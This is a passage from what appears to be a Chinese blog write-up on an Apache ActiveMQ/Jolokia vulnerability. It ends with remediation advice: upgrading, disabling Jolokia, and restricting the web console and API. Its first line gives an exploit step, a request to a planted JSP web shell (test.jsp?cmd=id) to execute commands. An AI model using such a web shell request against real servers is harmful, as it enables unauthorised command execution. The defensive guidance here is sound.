(8).访问http://your-ip/admin/test.jsp?cmd=id进行命令执行
5. 修复建议
-
升级至安全版本:
官方已修复漏洞,建议升级至ActiveMQ ≥5.16.6、≥5.17.4等29。 -
临时缓解措施:
-
禁用Jolokia服务(移除
jetty.xml中相关配置)。 -
限制Web控制台(8161端口)仅内网访问,并启用强密码认证。
-
对
/api/jolokia接口实施IP白名单或网络ACL79。
-
扫一扫
1634
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
